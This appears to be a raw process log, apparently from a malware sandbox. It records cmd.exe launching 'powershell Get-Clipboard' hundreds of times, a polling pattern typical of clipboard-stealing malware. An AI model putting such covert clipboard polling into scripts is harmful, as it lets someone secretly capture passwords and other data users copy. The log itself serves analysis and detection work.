C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
